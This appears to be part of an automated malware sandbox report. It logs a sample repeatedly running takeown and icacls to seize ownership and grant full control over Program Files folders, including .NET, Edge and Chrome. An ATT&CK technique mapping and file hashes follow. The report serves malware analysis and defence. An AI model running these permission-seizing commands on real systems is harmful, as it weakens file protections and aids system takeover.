  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\de" /a
  2⤵
  PID:2920
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\de" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2512
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\es" /a
  2⤵
  - Possible privilege escalation attempt
  PID:1016
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\es" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:4988
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\fr" /a
  2⤵
  - Modifies file permissions
  PID:4720
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\fr" /grant Administrators:F
  2⤵
  PID:2404
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\it" /a
  2⤵
  PID:292
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\it" /grant Administrators:F
  2⤵
  PID:6012
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ja" /a
  2⤵
  PID:792
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ja" /grant Administrators:F
  2⤵
  PID:1776
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3976
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ko" /a
  2⤵
  PID:3476
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ko" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:3896
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pl" /a
  2⤵
  PID:4416
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pl" /grant Administrators:F
  2⤵
  PID:5364
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pt-BR" /a
  2⤵
  - Modifies file permissions
  PID:5900
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pt-BR" /grant Administrators:F
  2⤵
  PID:4780
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1604
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ru" /a
  2⤵
  PID:4840
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ru" /grant Administrators:F
  2⤵
  PID:4144
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5604
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\tr" /a
  2⤵
  PID:4256
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\tr" /grant Administrators:F
  2⤵
  PID:540
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hans" /a
  2⤵
  PID:3432
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hans" /grant Administrators:F
  2⤵
  PID:2692
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hant" /a
  2⤵
  PID:1644
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hant" /grant Administrators:F
  2⤵
  PID:4708
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16" /a
  2⤵
  PID:5568
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16" /grant Administrators:F
  2⤵
  PID:4824
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\cs" /a
  2⤵
  PID:3208
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4928
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\cs" /grant Administrators:F
  2⤵
  PID:5476
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\de" /a
  2⤵
  PID:4004
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\de" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:4900
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\es" /a
  2⤵
  PID:5308
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\es" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1720
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\fr" /a
  2⤵
  - Possible privilege escalation attempt
  PID:1460
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\fr" /grant Administrators:F
  2⤵
  PID:4604
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\it" /a
  2⤵
  - Possible privilege escalation attempt
  PID:5164
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\it" /grant Administrators:F
  2⤵
  PID:5796
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ja" /a
  2⤵
  PID:776
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ja" /grant Administrators:F
  2⤵
  PID:628
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ko" /a
  2⤵
  PID:1680
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ko" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:5296
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pl" /a
  2⤵
  PID:5908
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pl" /grant Administrators:F
  2⤵
  PID:3268
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pt-BR" /a
  2⤵
  PID:4720
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pt-BR" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:5684
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ru" /a
  2⤵
  PID:3632
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ru" /grant Administrators:F
  2⤵
  PID:4228
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\tr" /a
  2⤵
  PID:5912
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\tr" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1844
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hans" /a
  2⤵
  PID:292
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hans" /grant Administrators:F
  2⤵
  PID:3832
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hant" /a
  2⤵
  - Modifies file permissions
  PID:2556
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hant" /grant Administrators:F
  2⤵
  PID:4444
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2" /a
  2⤵
  PID:2364
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:5004
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\cs" /a
  2⤵
  - Modifies file permissions
  PID:5116
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\cs" /grant Administrators:F
  2⤵
  PID:3172
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\de" /a
  2⤵
  PID:4544
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\de" /grant Administrators:F
  2⤵
  PID:2912
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\es" /a
  2⤵
  PID:2936
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\es" /grant Administrators:F
  2⤵
  PID:2692
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\fr" /a
  2⤵
  PID:5020
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\fr" /grant Administrators:F
  2⤵
  PID:3096
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\it" /a
  2⤵
  PID:4700
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\it" /grant Administrators:F
  2⤵
  PID:868
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ja" /a
  2⤵
  PID:2728
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ja" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:3640
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ko" /a
  2⤵
  PID:5708
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ko" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:5564
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pl" /a
  2⤵
  PID:1056
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pl" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:4848
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pt-BR" /a
  2⤵
  - Possible privilege escalation attempt
  PID:916
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pt-BR" /grant Administrators:F
  2⤵
  PID:2396
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ru" /a
  2⤵
  PID:6060
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ru" /grant Administrators:F
  2⤵
  PID:5460
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\tr" /a
  2⤵
  PID:420
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\tr" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:6128
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\zh-Hans" /a
  2⤵
  - Possible privilege escalation attempt
  PID:288
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\zh-Hans" /grant Administrators:F
  2⤵
  PID:2964
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3472
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\zh-Hant" /a
  2⤵
  PID:3872
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\zh-Hant" /grant Administrators:F
  2⤵
  PID:5084
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\swidtag" /a
  2⤵
  PID:2144
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\swidtag" /grant Administrators:F
  2⤵
  PID:5152
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4352_1250598361" /a
  2⤵
  PID:3556
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4352_1250598361" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:3476
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4352_1464804181" /a
  2⤵
  PID:4760
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4352_1464804181" /grant Administrators:F
  2⤵
  PID:5048
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4352_1874570795" /a
  2⤵
  PID:384
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4352_1874570795" /grant Administrators:F
  2⤵
  PID:3700
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4352_547017549" /a
  2⤵
  PID:3632
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4352_547017549" /grant Administrators:F
  2⤵
  PID:792
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4588_1354277851" /a
  2⤵
  - Possible privilege escalation attempt
  PID:1408
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4588_1354277851" /grant Administrators:F
  2⤵
  PID:4424
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4588_1844195679" /a
  2⤵
  PID:2584
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4588_1844195679" /grant Administrators:F
  2⤵
  PID:6092
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4588_921617627" /a
  2⤵
  - Modifies file permissions
  PID:2696
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4588_921617627" /grant Administrators:F
  2⤵
  PID:4380
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4596_217729105" /a
  2⤵
  PID:4204
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4596_217729105" /grant Administrators:F
  2⤵
  PID:6132
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4596_316599628" /a
  2⤵
  - Possible privilege escalation attempt
  PID:5976
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4596_316599628" /grant Administrators:F
  2⤵
  PID:1760
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4596_860005989" /a
  2⤵
  - Possible privilege escalation attempt
  PID:1728
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4596_860005989" /grant Administrators:F
  2⤵
  PID:1436
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4604_1784435341" /a
  2⤵
  PID:5788
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4604_1784435341" /grant Administrators:F
  2⤵
  PID:5044
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4604_1909617439" /a
  2⤵
  - Possible privilege escalation attempt
  PID:2132
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4604_1909617439" /grant Administrators:F
  2⤵
  PID:916
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4604_983173982" /a
  2⤵
  PID:5440
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4604_983173982" /grant Administrators:F
  2⤵
  PID:5968
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4640_2117354984" /a
  2⤵
  - Modifies file permissions
  PID:2920
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4640_2117354984" /grant Administrators:F
  2⤵
  PID:2616
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4640_2135484264" /a
  2⤵
  - Modifies file permissions
  PID:4088
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4640_2135484264" /grant Administrators:F
  2⤵
  PID:4640
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4640_590484034" /a
  2⤵
  PID:728
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4640_590484034" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1504
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\edge_BITS_4732_595216890" /a
  2⤵
  PID:4792
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\edge_BITS_4732_595216890" /grant Administrators:F
  2⤵
  PID:4760
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google" /a
  2⤵
  PID:2316
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google" /grant Administrators:F
  2⤵
  PID:4256
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome" /a
  2⤵
  - Modifies file permissions
  PID:4784
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:4752
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application" /a
  2⤵
  - Possible privilege escalation attempt
  PID:884
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application" /grant Administrators:F
  2⤵
  PID:4224
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\chrome.exe" /a
  2⤵
  PID:5020
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\chrome.exe" /grant Administrators:F
  2⤵
  PID:5140
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60" /a
  2⤵
  PID:3652
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\133.0.6943.60" /grant Administrators:F
  2⤵
  PID:1564
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\133.0.6943.60\chrome_pwa_launcher.exe" /a
  2⤵
  PID:2428

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5400

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3c4 0x244
1⤵
PID:376

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Direct Volume Access

T1006

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Network Share Discovery

T1135

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\microsoft shared\ClickToRun\msvcp120ex.dll

Filesize
8.0MB

MD5
89770e66768d9c2ad1c50732c7fbc98c

SHA1
d3ff67c3a366f7b2a70de02f36197bd59022ea98

SHA256
62c01a8e08dc0d10d8c15828e66e41b86848ea2f346a569fefbaa84a37700269

SHA512
aec6c70ae6b33cb8356aed37fe8844ab9f18f26c6f5d04359ec016c4889a764c6c2b1f1036b3245b4065fcd76261eb7cc43c99b31d1308e1e83b939efaf370ee

Download Submit
C:\Program Files\Common Files\microsoft shared\OFFICE16\537882728

Filesize
524KB

MD5
f0ce7c68acb7d6456cf406432dcd4307

SHA1
00f33247cb0e90a4550967af9cc05427eea9fd53

SHA256
45cd5cc59f124df29b2c69b17c31f00c56eb45d67633ae7624a8d38c759020e0

SHA512
f370b09e91eb29a51cd3001dceb4c37a05b20e541e28583c861999aae7524ac171c6b629e0af8506d148a871d00b4465bda883da1f40e503f922167dfc286e51

Download Submit
C:\Windows\System32\msconfig.exe

Filesize
35KB

MD5
62f170fb07fdbb79ceb7147101406eb8

SHA1
d9bbb4e4900ff03b0486fac32768170249dad82d

SHA256
53e000f5aa9b3a00934319db8080bb99cb323bf48fc628a64f75d7847c265606

SHA512
81bd918ec7617acea3d8b5659ac518e5bc19e585f49bdd601fff6fadea95f2fd57450ee41d181280089b92c949289249a350aa5428e2e31b53fdff2f47c46265

Download Submit
memory/4556-0-0x00007FFC79643000-0x00007FFC79645000-memory.dmp

Filesize
8KB

Download
memory/4556-1-0x0000000000DB0000-0x00000000015C2000-memory.dmp

Filesize
8.1MB

Download
memory/4556-2-0x00007FFC79640000-0x00007FFC7A101000-memory.dmp

Filesize
10.8MB

Download
memory/4556-43-0x00007FFC79643000-0x00007FFC79645000-memory.dmp

Filesize
8KB

Download
memory/4556-46-0x000000001C330000-0x000000001C4D9000-memory.dmp

Filesize
1.7MB

Download
memory/4556-47-0x00007FFC79640000-0x00007FFC7A101000-memory.dmp

Filesize
10.8MB

Download
memory/4556-114-0x000000001D720000-0x000000001D780000-memory.dmp

Filesize
384KB

Download
memory/4556-115-0x000000001C330000-0x000000001C4D9000-memory.dmp

Filesize
1.7MB

Download
memory/4556-172-0x000000001C330000-0x000000001C4D9000-memory.dmp

Filesize
1.7MB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads